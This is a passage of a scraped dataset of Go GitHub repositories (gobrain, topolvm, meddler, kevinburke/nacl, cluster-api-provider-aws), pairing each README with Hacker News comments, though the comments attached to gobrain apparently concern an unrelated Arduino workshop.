desktop applications written in python, they're soo slow. I hope Go gets used both in the application space and system space, so not just our systems are fast, the applications too.How good is the Go optimizer? I would guess that there's still a lot of room for improvement because that's not something you'd spend a lot of time on early in the life of a language.I'm genuinely curious - Scala is faster and better performant, what is there in GO that there isn't in Scala? I mean, if you were to build a highly scalable web app, why would you choose one over the other? Any thoughts??The argument here doesn't seem to be whether or not Go is a good programming language (what I would describe as what it's good for), but rather whether it will become popular.One has very little to do with the other.If you\u2019re a C/C++ programmer where you\u2019re already at 100/100 on the above chart, where is your motive to switch here?Someone a little biased here? That scale doesn't even mention concurrency, compilation speed, and duck typing.In other words: here's some attributes, all of which C++ is \"good at.\" These are the only attributes against which we should measure systems programming.I think assembly has C++ beat on a lot of those, yet C++ has the top score. Hmmm.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "goml/gobrain", "link": "https://github.com/goml/gobrain", "tags": [], "stars": 535, "description": "Neural Networks written in go", "lang": "Go", "repo_lang": "", "readme": "# gobrain\n\nNeural Networks written in go\n\n[![GoDoc](https://godoc.org/github.com/goml/gobrain?status.svg)](https://godoc.org/github.com/goml/gobrain)\n[![Build Status](https://travis-ci.org/goml/gobrain.svg?branch=master)](https://travis-ci.org/goml/gobrain)\n\n## Getting Started\nThe version `1.0.0` includes just basic Neural Network functions such as Feed Forward and Elman Recurrent Neural Network.\nA simple Feed Forward Neural Network can be constructed and trained as follows:\n\n```go\npackage main\n\nimport (\n\t\"github.com/goml/gobrain\"\n\t\"math/rand\"\n)\n\nfunc main() {\n\t// set the random seed to 0\n\trand.Seed(0)\n\n\t// create the XOR representation patter to train the network\n\tpatterns := [][][]float64{\n\t\t{{0, 0}, {0}},\n\t\t{{0, 1}, {1}},\n\t\t{{1, 0}, {1}},\n\t\t{{1, 1}, {0}},\n\t}\n\n\t// instantiate the Feed Forward\n\tff := &gobrain.FeedForward{}\n\n\t// initialize the Neural Network;\n\t// the networks structure will contain:\n\t// 2 inputs, 2 hidden nodes and 1 output.\n\tff.Init(2, 2, 1)\n\n\t// train the network using the XOR patterns\n\t// the training will run for 1000 epochs\n\t// the learning rate is set to 0.6 and the momentum factor to 0.4\n\t// use true in the last parameter to receive reports about the learning error\n\tff.Train(patterns, 1000, 0.6, 0.4, true)\n}\n\n```\n\nAfter running this code the network will be trained and ready to be used.\n\nThe network can be tested running using the `Test` method, for instance:\n\n```go\nff.Test(patterns)\n```\n\nThe test operation will print in the console something like:\n\n```\n[0 0] -> [0.057503945708445] : [0]\n[0 1] -> [0.930100635071210] : [1]\n[1 0] -> [0.927809966227284] : [1]\n[1 1] -> [0.097408795324620] : [0]\n```\n\nWhere the first values are the inputs, the values after the arrow `->` are the output values from the network and the values after `:` are the expected outputs.\n\nThe method `Update` can be used to predict the output given an input, for example:\n\n```go\ninputs := []float64{1, 1}\nff.Update(inputs)\n```\n\nthe output will be a vector with values ranging from `0` to `1`.\n\nIn the example folder there are runnable examples with persistence of the trained network on file.\n\nIn example/02 the network is saved on file and in example/03 the network is loaded from file.\n\nTo run the example cd in the folder and run\n\n\tgo run main.go\n\n## Recurrent Neural Network\n\nThis library implements Elman's Simple Recurrent Network.\n\nTo take advantage of this, one can use the `SetContexts` function.\n\n```go\nff.SetContexts(1, nil)\n```\n\nIn the example above, a single context will be created initialized with `0.5`. It is also possible\nto create custom initialized contexts, for instance:\n\n```go\ncontexts := [][]float64{\n\t{0.5, 0.8, 0.1}\n}\n```\n\nNote that custom contexts must have the same size of hidden nodes + 1 (bias node),\nin the example above the size of hidden nodes is 2, thus the context has 3 values.\n\n## Changelog\n* 1.0.0 - Added Feed Forward Neural Network with contexts from Elman RNN\n\n", "readme_type": "markdown", "hn_comments": "BTW, the first event you do is always the hardest- remember Michael Arrington had the first TecCrunch meetups in his backyard. Provide a quality event regardless of size and build on its success for your next oneSecond time typing this, may have missed something. Got an expired link message.USP - Unique Selling Proposition. Why you? What pain are you solving? What are they getting?The very first thing should be:Come to a four hour workshop and learn how to program an open-source prototyping board and interface with sensors or LEDs. When you leave this workshop, you'll be able to control an LED, read a sensor and control a device from your computer. Don't have an Arduino? You can borrow one or buy one from us.The first thing I read should tell me precisely what you're offering - at that point, I need to know more details.If you're looking for 18-30, you're probably exposing them to technology they may not have heard of. Why should they be there? Learn hardware, learn programming, learn some basic electronics, learn hardware interfaces, etc.You should attend if you want to: learn to control an external device from your computer, want to control a series of LEDS based on inputs from sensors, etc.At this point, you've hit them with the first paragraph that tells them what the expectations are and what they're going to learn. Now, you need to describe What an Arduino is, the workshop you're putting on, etc.* utensil misspelledMake a list of the development environment requirements, libraries that they may want to have handy, etc. You may have this in the confirmation email, I don't know. You want to have a pre-check to make sure they all have what they need - i.e. if you haven't worked with Arduino, show up 30 minutes ahead, we'll plug in an arduino, load a quick program and make sure it builds and runs. You don't want the first 45 minutes spent trying to debug and diagnose getting them working.I believe for the event price, you're outside impulse purchases and you had too short a time from announce to workshop. I know you built it up in a number of the Hack and Tells, but, from presented concept to event, I think your timetable was too short - and is scheduled on an already busy (potentially expensive) weekend for some potential clients. That said, are vistors from out of town potentially interested in this versus the weekend on the beach in SoBe? Cross promotion could work, but, that makes for one very expensive weekend for part of your target demographic.Referrals work, are hard to track, should be part of the event management side.For the Arduino thing we talked about, I suspected based on equipment costs that I would need a 3-4 month announce to event and I still felt that would be cutting it close.Alumni, college groups, obviously those in computer or engineering classes may be interested. I would think with your connections, you may have already covered this.Find potential meetup groups that have some crossover. Neil is part of a hardware meetup - they may know students, etc. Perhaps the Android User Group (since there is an ADK that uses arduino, there might be some crossover).Ironically, I'm completely FUBARing my metrics by posting this, but I feel I've collected a decent sample to justify the value I'd be getting. But, if you get this far and want to help, please use these links so I can segment this traffic from my results.http://hackthisarduino.com/?hn=truehttp://hackthisarduino-hn.eventbrite.com/Anyone that puts themselves out there gets respect in my book.I think the site looks good and Arduino is super cool- it is something on my wishlist of fun things to do when I have some free time. Robots rule and Arduino chips seem to be in lots of them.If you are ever interested in coverage of your event (and we can get a writer where you are to go) its exactly the type of story we'd run on http://tech.li Feel free to reach out to us and best of luckFirst off, a thousand apologies - I went to your site before I read your reply. Consequently, you'll have a visitor from Regina, Saskatchewan polluting your results....I'm going to start by talking about some things you are doing extremely well:1. Great work coming here and asking for feedback. That takes a whole lot of courage!2. I love how deeply you are dissecting your own work - you've got a great attitude!And now for some general questions:1. Are you sure there is actually demand for this? I know that this is the ugliest question to ask (and the ugliest answer to ponder), but I suggest that you start here.2. Are you sure that the people who you think will be most interested (males between 18 - 30) are actually interested enough in this to convert? Have you ever thought of targeting some retired people (especially engineers)? As an example, I know an engineer who just retired who would sign up for this in a second (if he lived in South Florida)And finally for some criticism:1. I really like your website, but I have some problems with the text. While the writing itself is great, I question whether 12px helvetica was the correct choice. I also wonder whether your conversion rate wouldn't improve if you increased the line spacing and decreased the total amount of text on the homepage. With the web, the more words you have the lower the chance that anyone will actually read all of them!2. I question the information flow - if I were in your shoes, I'd likely design the information flow around a 'what is Arduino - what can I do with it? - why should I learn about it?' pattern. Might be worth doing a split test to see if that sort of flow has a higher conversion rate.3. Here's a picky little thing that I only noticed because I'm a little obsessive compulsive about such things. Consider this scenario:- I live in South Florida (I wish) and arrive on your website.- I get down to the bottom and decide, \"This sounds cool.\"- I decide I want to sign up for the newbie package, so I click \"Signup Now\" (below the newbie package).- I arrive on the Eventbrite page and discover that 'newbie package' has a quantity of zero.Now I'm in some trouble. I can't remember whether I wanted the newbie package, the auditor package or the loaner package. Do I hit back? Will that mess everything up? Hmmm...I wonder what is happening on Hacker News....All in all, great work throwing this event and if I lived closer, I'd definitely take it. I hope some of this helps!!Overall I think the site looks great. Here is a couple things I would at least A/B test:* Putting the prices on the page. I hate not knowing how much something is going to cost and I think it can surprise people when they click through.* Your linked slideshow is okay, but I think it might be beyond a lot of the audience that you want to reach. I would scrap it and...* I think you need to add an example project or two about what you can do with the Arduino (like maybe this one - http://j4mie.org/blog/how-to-make-a-physical-gmail-notifier/). As a software guy this would \"sell\" me.Good luck with it! I think you're onto a great idea and I like the \"loan\" option to allow people to just play with one.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "topolvm/topolvm", "link": "https://github.com/topolvm/topolvm", "tags": ["kubernetes", "csi", "lvm2"], "stars": 535, "description": "Capacity-aware CSI plugin for Kubernetes", "lang": "Go", "repo_lang": "", "readme": "![TopoLVM logo](./docs/img/TopoLVM_logo.svg)\n[![GitHub release](https://img.shields.io/github/v/release/topolvm/topolvm.svg?maxAge=60)][releases]\n[![Main](https://github.com/topolvm/topolvm/workflows/Main/badge.svg)](https://github.com/topolvm/topolvm/actions)\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/topolvm/topolvm?tab=overview)](https://pkg.go.dev/github.com/topolvm/topolvm?tab=overview)\n[![Go Report Card](https://goreportcard.com/badge/github.com/topolvm/topolvm)](https://goreportcard.com/badge/github.com/topolvm/topolvm)\n\nTopoLVM\n=======\n\nTopoLVM is a [CSI][] plugin using LVM for Kubernetes.\nIt can be considered as a specific implementation of [local persistent volumes](https://kubernetes.io/docs/concepts/storage/volumes/#local) using CSI and LVM.\n\n- **Project Status**: Testing for production\n- **Conformed CSI version**: [1.5.0](https://github.com/container-storage-interface/spec/blob/v1.5.0/spec.md)\n\nOur supported platform are:\n\n- Kubernetes: 1.25, 1.24, 1.23\n- Node OS: Linux with LVM2 (*1)\n- Filesystems: ext4, xfs, btrfs(experimental)\n- lvm version 2.02.163 or later (adds JSON output support)\n\n*1 The host's Linux Kernel must be v4.9 or later which supports `rmapbt` and `reflink`, if you use xfs filesystem with an official docker image.\n\nDocker images are available on [ghcr.io](https://github.com/orgs/topolvm/packages). \n**Please note that [the images on quay.io](https://quay.io/organization/topolvm) are deprecated and will be removed in the future.**\n\nGetting started\n---------------\n\nA demonstration of TopoLVM running on [kind (Kubernetes IN Docker)][kind] is available at [example](example/) directory.\n\nFor production deployments, see [deploy/README.md](./deploy/README.md).\n\nUser manual is at [docs/user-manual.md](docs/user-manual.md).\n\n_Deprecated: If you want to use TopoLVM on [Rancher/RKE](https://rancher.com/docs/rke/latest/en/), see [docs/deprecated/rancher.md](docs/deprecated/rancher.md)._\n\nContributing\n------------\n\nTopoLVM project welcomes contributions from any member of our community. To get\nstarted contributing, please see our [Contributing Guide](CONTRIBUTING.md).\n\nScope\n-----\n\n### In Scope\n\n- [Dynamic provisioning](https://kubernetes-csi.github.io/docs/external-provisioner.html): Volumes are created dynamically when `PersistentVolumeClaim` objects are created.\n- [Raw block volume](https://kubernetes-csi.github.io/docs/raw-block.html): Volumes are available as block devices inside containers.\n- [Topology](https://kubernetes-csi.github.io/docs/topology.html): TopoLVM uses CSI topology feature to schedule Pod to Node where LVM volume exists.\n- Extended scheduler: TopoLVM extends the general Pod scheduler to prioritize Nodes having larger storage capacity.\n- Volume metrics: Usage stats are exported as Prometheus metrics from `kubelet`.\n- [Volume Expansion](https://kubernetes-csi.github.io/docs/volume-expansion.html): Volumes can be expanded by editing `PersistentVolumeClaim` objects.\n- [Storage capacity tracking](https://github.com/topolvm/topolvm/tree/main/deploy#storage-capacity-tracking): You can enable Storage Capacity Tracking mode instead of using topolvm-scheduler.\n\n### Planned features\n\n- [Snapshot](https://kubernetes-csi.github.io/docs/snapshot-restore-feature.html): When we want it.\n\n### Deprecated features\n\n- [Pod security policy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) support is deprecated and will be removed when TopoLVM removes the support of Kubernetes < v1.25. This policy is same as Kubernetes.\n\nCommunications\n--------------\n\nIf you have any questions or ideas, please use [discussions](https://github.com/topolvm/topolvm/discussions).\n\nResources\n---------\n\n[docs](docs/) directory contains the user manual, designs and specifications, and so on.\n\nA diagram of components is available in [docs/design.md](docs/design.md#diagram).\n\nTopoLVM maintainers presented the motivation and implementation of TopoLVM at KubeCon Europe 2020: https://kccnceu20.sched.com/event/ZerD\n\nLicense\n-------\n\nThis project is licensed under [Apache License 2.0](LICENSE).\n\n[releases]: https://github.com/topolvm/topolvm/releases\n[CSI]: https://github.com/container-storage-interface/spec\n[kind]: https://github.com/kubernetes-sigs/kind\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "russross/meddler", "link": "https://github.com/russross/meddler", "tags": [], "stars": 534, "description": "conversion between sql and structs in go", "lang": "Go", "repo_lang": "", "readme": "Meddler [![Build Status](https://travis-ci.org/russross/meddler.svg?branch=master)](https://travis-ci.org/russross/meddler) [![GoDoc](https://godoc.org/github.com/russross/meddler?status.svg)](https://godoc.org/github.com/russross/meddler) [![Go Report Card](https://goreportcard.com/badge/github.com/russross/meddler)](https://goreportcard.com/report/github.com/russross/meddler)\n=======\n\nMeddler is a small toolkit to take some of the tedium out of moving data\nback and forth between SQL queries and structs.\n\nIt is not a complete ORM. Meddler is intended to be a lightweight way to add some\nof the convenience of an ORM while leaving more control in the hands of the\nprogrammer.\n\nPackage docs are available at:\n\n* http://godoc.org/github.com/russross/meddler\n\nThe package is housed on GitHub, and the README there has more info:\n\n* http://github.com/russross/meddler\n\nMeddler is currently configured for SQLite, MySQL, and PostgreSQL, but it\ncan be configured for use with other databases. If you use it\nsuccessfully with a different database, please contact me and I will\nadd it to the list of pre-configured databases.\n\n### DANGER\n\nMeddler is still a work in progress, and additional\nbackward-incompatible changes to the API are likely. The most recent\nchange added support for multiple database types and made it easier\nto switch between them. This is most likely to affect the way you\ninitialize the library to work with your database (see the install\nsection below).\n\nAnother recent update is the change to int64 for primary keys. This\nmatches the convention used in database/sql, and is more portable,\nbut it may require some minor changes to existing code.\n\n\nInstall\n-------\n\nThe usual `go get` command will put it in your `$GOPATH`:\n\n go get github.com/russross/meddler\n\nIf you are only using one type of database, you should set Default\nto match your database type, e.g.:\n\n meddler.Default = meddler.PostgreSQL\n\nThe default database is MySQL, so you should change it for anything\nelse. To use multiple databases within a single project, or to use a\ndatabase other than MySQL, PostgreSQL, or SQLite, see below.\n\nNote: If you are using MySQL with the `github.com/go-sql-driver/mysql`\ndriver, you must set \"parseTime=true\" in the sql.Open call or the\ntime conversion meddlers will not work.\n\n\nWhy?\n----\n\nThese are the features that set meddler apart from similar\nlibraries:\n\n* It uses standard database/sql types, and does not require\n special fields in your structs. This lets you use meddler\n selectively, without having to alter other database code already\n in your project. After creating meddler, I incorporated it into\n an existing project, and I was able to convert the code one\n struct and one query at a time.\n* It leaves query writing to you. It has convenience functions for\n simple INSERT/UPDATE/SELECT queries by integer primary key, but\n beyond that it stays out of query writing.\n* It supports on-the-fly data transformations. If you have a map\n or a slice in your struct, you can instruct meddler to\n encode/decode using JSON or Gob automatically. If you have time\n fields, you can have meddler automatically write them into the\n database as UTC, and convert them to the local time zone on\n reads. These processors are called \u201cmeddlers\u201d, because they\n meddle with the data instead of passing it through directly.\n* NULL fields in the database can be read as zero values in the\n struct, and zero values in the struct can be written as NULL\n values. This is not always the right thing to do, but it is\n often good enough and is much simpler than most alternatives.\n* It exposes low-level hooks for more complex situations. If you\n are writing a query that does not map well to the main helper\n functions, you can still get some help by using the lower-level\n functions to build your own helpers.\n\n\nHigh-level functions\n--------------------\n\nMeddler does not create or alter tables. It just provides a little\nglue to make it easier to read and write structs as SQL rows. Start\nby annotating a struct:\n\n``` go\ntype Person struct {\n ID int `meddler:\"id,pk\"`\n Name string `meddler:\"name\"`\n Age int\n salary int\n Created time.Time `meddler:\"created,localtime\"`\n Closed time.Time `meddler:\",localtimez\"`\n}\n```\n\nNotes about this example:\n\n* If the optional tag is provided, the first field is the database\n column name. Note that \"Closed\" does not provide a column name,\n so it will default to \"Closed\". Likewise, if there is no tag,\n the field name will be used.\n* ID is marked as the primary key. Currently only integer primary\n keys are supported. This is only relevant to Load, Save, Insert,\n and Update, a few of the higher-level functions that need to\n understand primary keys. Meddler assumes that pk fields have an\n autoincrement mechanism set in the database.\n* Age has a column name of \"Age\". A tag is only necessary when the\n column name is not the same as the field name, or when you need\n to select other options.\n* salary is not an exported field, so meddler does not see it. It\n will be ignored.\n* Created is marked with \"localtime\". This means that it will be\n converted to UTC when being saved, and back to the local time\n zone when being loaded.\n* Closed has a column name of \"Closed\", since the tag did not\n specify anything different. Closed is marked as \"localtimez\".\n This has the same properties as \"localtime\", except that the\n zero time will be saved in the database as a null column (and\n null values will be loaded as the zero time value).\n* You can set a default column name mapping by setting\n `meddler.Mapper` to a `func(s string) string` function. For\n example, `meddler.Mapper = meddler.SnakeCase` will convert field\n names to snake_case unless an explict column name is specified.\n\nMeddler provides a few high-level functions (note: DB is an\ninterface that works with a *sql.DB or a *sql.Tx):\n\n* Load(db DB, table string, dst interface{}, pk int64) error\n\n This loads a single record by its primary key. For example:\n\n ```go\n elt := new(Person)\n err := meddler.Load(db, \"person\", elt, 15)\n ```\n\n db can be a *sql.DB or a *sql.Tx. The table is the name of the\n table, pk is the primary key value, and dst is a pointer to the\n struct where it should be stored.\n\n Note: this call requires that the struct have an integer primary\n key field marked.\n\n* Insert(db DB, table string, src interface{}) error\n\n This inserts a new row into the database. If the struct value\n has a primary key field, it must be zero (and will be omitted\n from the insert statement, prompting a default autoincrement\n value).\n\n ```go\n elt := &Person{\n Name: \"Alice\",\n Age: 22,\n // ...\n }\n err := meddler.Insert(db, \"person\", elt)\n // elt.ID is updated to the value assigned by the database\n ```\n\n* Update(db DB, table string, src interface{}) error\n\n This updates an existing row. It must have a primary key, which\n must be non-zero.\n\n Note: this call requires that the struct have an integer primary\n key field marked.\n\n* Save(db DB, table string, src interface{}) error\n\n Pick Insert or Update automatically. If there is a non-zero\n primary key present, it uses Update, otherwise it uses Insert.\n\n Note: this call requires that the struct have an integer primary\n key field marked.\n\n* QueryRow(db DB, dst interface{}, query string, args ...interface) error\n\n Perform the given query, and scan the single-row result into\n dst, which must be a pointer to a struct.\n\n For example:\n\n ```go\n elt := new(Person)\n err := meddler.QueryRow(db, elt, \"select * from person where name = ?\", \"bob\")\n ```\n\n* QueryAll(db DB, dst interface{}, query string, args ...interface) error\n\n Perform the given query, and scan the results into dst, which\n must be a pointer to a slice of struct pointers.\n\n For example:\n\n ```go\n var people []*Person\n err := meddler.QueryAll(db, &people, \"select * from person\")\n ```\n \n* Scan(rows *sql.Rows, dst interface{}) error\n\n Scans a single row of data into a struct, complete with\n meddling. Can be called repeatedly to walk through all of the\n rows in a result set. Returns sql.ErrNoRows when there is no\n more data.\n\n* ScanRow(rows *sql.Rows, dst interface{}) error\n\n Similar to Scan, but guarantees that the rows object\n is closed when it returns. Also returns sql.ErrNoRows if there\n was no row.\n\n* ScanAll(rows *sql.Rows, dst interface{}) error\n\n Expects a pointer to a slice of structs/pointers to structs, and\n appends as many elements as it finds in the row set. Closes the\n row set when it is finished. Does not return sql.ErrNoRows on an\n empty set; instead it just does not add anything to the slice.\n\nNote: all of these functions can also be used as methods on Database\nobjects. When used as package functions, they use the Default\nDatabase object, which is MySQL unless you change it.\n\n\nMeddlers\n--------\n\nA meddler is a handler that gets to meddle with a field before it is\nsaved, or when it is loaded. \"localtime\" and \"localtimez\" are\nexamples of built-in meddlers. The full list of built-in meddlers\nincludes:\n\n* identity: the default meddler, which does not do anything\n\n* localtime: for time.Time and *time.Time fields. Converts the\n value to UTC on save, and back to the local time zone on loads.\n To set your local time zone, make sure the TZ environment\n variable is set when your program is launched, or use something\n like:\n\n ```go\n os.Setenv(\"TZ\", \"America/Denver\")\n ```\n\n in your initial setup, before you start using time functions.\n\n* localtimez: same, but only for time.Time, and treats the zero\n time as a null field (converts both ways)\n\n* utctime: similar to localtime, but keeps the value in UTC on\n loads. This ensures that the time is always coverted to UTC on\n save, which is the sane way to save time values in a database.\n\n* utctimez: same, but with zero time means null.\n\n* zeroisnull: for other types where a zero value should be\n inserted as null, and null values should be read as zero values.\n Works for integer, unsigned integer, float, complex number, and\n string types. Note: not for pointer types.\n\n* json: marshals the field value into JSON when saving, and\n unmarshals on load.\n\n* jsongzip: same, but compresses using gzip on save, and\n uncompresses on load\n \n* gob: encodes the field value using Gob when saving, and\n decodes on load.\n\n* gobgzip: same, but compresses using gzip on save, and\n uncompresses on load\n \nYou can implement custom meddlers as well by implementing the\nMeddler interface. See the existing implementations in medder.go for\nexamples.\n\n\nWorking with different database types\n-------------------------------------\n\nMeddler can work with multiple database types simultaneously.\nDatabase-specific parameters are stored in a Database struct, and\nstructs are pre-defined for MySQL, PostgreSQL, and SQLite.\n\nInstead of relying on the package-level functions, use the method\nform on the appropriate database type, e.g.:\n \n```go \nerr = meddler.PostgreSQL.Load(...)\n```\n\ninstead of\n\n```go\nerr = meddler.Load(...)\n```\n\nOr to save typing, define your own abbreviated name for each\ndatabase:\n\n```go\nms := meddler.MySQL\npg := meddler.PostgreSQL\nerr = ms.Load(...)\nerr = pg.QueryAll(...)\n```\n\nIf you need a different database, create your own Database instance\nwith the appropriate parameters set. If everything works okay,\nplease contact me with the parameters you used so I can add the new\ndatabase to the pre-defined list.\n\n\nLower-level functions\n---------------------\n\nIf you are using more complex queries and just want to reduce the\ntedium of reading and writing values, there are some lower-level\nhelper functions as well. See the package docs for details, and\nsee the implementations of the higher-level functions to see how\nthey are used.\n\n\nLicense\n-------\n\nMeddler is distributed under the BSD 2-Clause License. If this\nlicense prevents you from using Meddler in your project, please\ncontact me and I will consider adding an additional license that is\nbetter suited to your needs.\n\n> Copyright \u00a9 2013 Russ Ross.\n> All rights reserved.\n> \n> Redistribution and use in source and binary forms, with or without\n> modification, are permitted provided that the following conditions\n> are met:\n> \n> 1. Redistributions of source code must retain the above copyright\n> notice, this list of conditions and the following disclaimer.\n> \n> 2. Redistributions in binary form must reproduce the above\n> copyright notice, this list of conditions and the following\n> disclaimer in the documentation and/or other materials provided with\n> the distribution.\n> \n> THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n> \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n> LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n> FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n> COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n> INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n> BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n> LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n> CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n> LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n> ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n> POSSIBILITY OF SUCH DAMAGE.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kevinburke/nacl", "link": "https://github.com/kevinburke/nacl", "tags": ["golang", "nacl", "security", "secretbox", "curve25519"], "stars": 534, "description": "Pure Go implementation of the NaCL set of API's", "lang": "Go", "repo_lang": "", "readme": "# go-nacl\n\n[![GoDoc](https://godoc.org/github.com/kevinburke/nacl?status.svg)](https://godoc.org/github.com/kevinburke/nacl)\n\nThis is a pure Go implementation of the API's available in NaCL:\nhttps://nacl.cr.yp.to. Compared with the implementation in\ngolang.org/x/crypto/nacl, this library offers *all* of the API's present in\nNaCL, better compatibility with NaCL implementations written in other languages,\nas well as some utilities for generating and loading keys and nonces, and\nencrypting messages.\n\nMany of them are simple wrappers around functions or libraries available in the\nGo standard library, or in the golang.org/x/crypto package. Other code I copied\ndirectly into this library with the appropriate LICENSE; if a function is longer\nthan, say, 5 lines, I didn't write it myself. There are no dependencies outside\nof the standard library or golang.org/x/crypto.\n\nThe goal is to both show how to implement the NaCL functions in pure Go, and\nto provide interoperability between messages encrypted/hashed/authenticated in\nother languages, and available in Go.\n\nAmong other benefits, NaCL is designed to be misuse resistant and standardizes\non the use of 32 byte keys and 24 byte nonces everywhere. Several helpers are\npresent for generating keys/nonces and loading them from configuration, as well\nas for encrypting messages. You can generate a key by running `openssl rand -hex\n32` and use the helpers in your program like so:\n\n```go\nimport \"github.com/kevinburke/nacl\"\nimport \"github.com/kevinburke/nacl/secretbox\"\n\nfunc main() {\n key, err := nacl.Load(\"6368616e676520746869732070617373776f726420746f206120736563726574\")\n if err != nil {\n panic(err)\n }\n encrypted := secretbox.EasySeal([]byte(\"hello world\"), key)\n fmt.Println(base64.StdEncoding.EncodeToString(encrypted))\n}\n```\n\nThe package names match the primitives available in NaCL, with the `crypto_`\nprefix removed. Some function names have been changed to match the Go\nconventions.\n\n### Installation\n\n```\ngo get github.com/kevinburke/nacl\n```\n\nOr you can Git clone the code directly to $GOPATH/src/github.com/kevinburke/nacl.\n\n### Who am I?\n\nWhile you probably shouldn't trust random security code from the Internet,\nI'm reasonably confident that this code is secure. I did not implement any\nof the hard math (poly1305, XSalsa20, curve25519) myself - I call into\ngolang.org/x/crypto for all of those functions. I also ported over every test\nI could find from the C/C++ code, and associated RFC's, and ensured that these\nlibraries passed those tests.\n\nI'm [a contributor to the Go Standard Library and associated\ntools][contributor], and I've also been paid to do [security\nconsulting][services] for startups, and [found security problems in consumer\nsites][capital-one].\n\n[contributor]: https://go-review.googlesource.com/q/owner:kev%2540inburke.com\n[capital-one]: https://burke.services/capital-one-open-redirect.html\n[services]: https://burke.services\n\n### Errata\n\n- The implementation of `crypto_sign` uses the `ref10` implementation of ed25519\nfrom SUPERCOP, *not* the current implementation in NaCL. The difference is that\nthe entire 64-byte signature is prepended to the message; in the current version\nof NaCL, separate bits are prepended and appended to the message.\n\n- Compared with `crypto/ed25519`, this library's Sign\nimplementation returns the message along with the signature, and Verify\nexpects the first 64 bytes of the message to be the signature. This simplifies\nthe API and matches the behavior of the ref10 implementation and other NaCL\nimplementations. Sign also flips the order of the message and the private key:\n`Sign(message, privatekey)`, to match the NaCL implementation.\n\n- Compared with `golang.org/x/crypto/nacl/box`, `Precompute` returns the shared\nkey instead of modifying the input. In several places the code was modified to\ncall functions that now exist in `nacl`.\n\n- Compared with `golang.org/x/crypto/nacl/secretbox`, `Seal` and `Open`\ncall the `onetimeauth` package in this library, instead of calling\n`golang.org/x/crypto/poly1305` directly.\n", "readme_type": "markdown", "hn_comments": "Excellent. I am using my own pure-go lib, hacked up just to avoid hassle of binding to native code, but it supports only features I need.Thanks Kevin.Oh good. I was just about to use https://github.com/GoKillers/libsodium-go, but I'd rather not have to depend on CGO.Thanks! I've been wondering why the golang crypto repo contains only half an implementation for so long. I guess people are not generally eager to take responsibility for crypto implementations, especially semi-official ones...It would be nice if the golang devs would pick an Argon2 implementation too (Blake2 hash is already there); it always feels prudent not to use any crypto libraries lest they receive some sort of semi-official blessing from the either language's own creators or renowned cryptographers.Also interesting, this is the first package I've seen in the wild that uses Bazel.I love the README, it's very modest and I enjoy reading things like \"if a function is longer than, say, 5 lines, I didn't write it myself.\" and \"While you probably shouldn't trust random security code from the Internet, I'm reasonably confident that this code is secure. I did not implement any of the hard math (poly1305, XSalsa20, curve25519) myself - I call into golang.org/x/crypto for all of those functions. I also ported over every test I could find from the C/C++ code, and associated RFC's, and ensured that these libraries passed those tests.\"I will wait for other companies to use it first - but it looks like a very level-headed implementation that won't be hard for the author to maintain - and a very useful tool.Did a quick ctrl + F in the readme to look for how they handle timing attacks in Go. As this is a pure Go implementation, I'm curious - how are these attacks mitigated, or is that left to consumers of the library?I'm confused - does this have anything to do with Google's NaCL plug-in architecture for Chrome? Or is it only a set of crypto routines that have an unfortunate name collision with the former?Amazing work, thank you!\nLet's see if saltpack[1] will move to this at some point! :D1. https://github.com/keybase/saltpackPlease stop upvoting insider gossip like this. This is not interesting at all to anybody outside Google.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/cluster-api-provider-aws", "link": "https://github.com/kubernetes-sigs/cluster-api-provider-aws", "tags": ["k8s-sig-cluster-lifecycle", "cluster-api", "kubernetes-cluster"], "stars": 533, "description": "Kubernetes Cluster API Provider AWS provides consistent deployment and day 2 operations of \"self-managed\" and EKS Kubernetes clusters on AWS.", "lang": "Go", "repo_lang": "", "readme": "# Kubernetes Cluster API Provider AWS\n\n

\n\"Powered\n

\n

\n\n\n\n\n\n\n\n\n\n\n\n\n

\n\n------\n\nKubernetes-native declarative infrastructure for AWS.\n\n## What is the Cluster API Provider AWS\n\nThe [Cluster API][cluster_api] brings\ndeclarative, Kubernetes-style APIs to cluster creation, configuration and\nmanagement.\n\nThe API itself is shared across multiple cloud providers allowing for true AWS\nhybrid deployments of Kubernetes. It is built atop the lessons learned from\nprevious cluster managers such as [kops][kops] and\n[kubicorn][kubicorn].\n\n## Documentation\n\nPlease see our [book](https://cluster-api-aws.sigs.k8s.io) for in-depth documentation.\n\n## Launching a Kubernetes cluster on AWS\n\nCheck out the [Cluster API Quick Start](https://cluster-api.sigs.k8s.io/user/quick-start.html) for launching a\ncluster on AWS.\n\n## Features\n\n- Native Kubernetes manifests and API\n- Manages the bootstrapping of VPCs, gateways, security groups and instances.\n- Choice of Linux distribution among Amazon Linux 2, CentOS 7, Ubuntu(18.04, 20.04) and Flatcar\n using [pre-baked AMIs][published_amis].\n- Deploys Kubernetes control planes into private subnets with a separate\n bastion server.\n- Doesn't use SSH for bootstrapping nodes.\n- Installs only the minimal components to bootstrap a control plane and workers.\n- Supports control planes on EC2 instances.\n- [EKS support][eks_support]\n\n------\n\n## Compatibility with Cluster API and Kubernetes Versions\n\nThis provider's versions are compatible with the 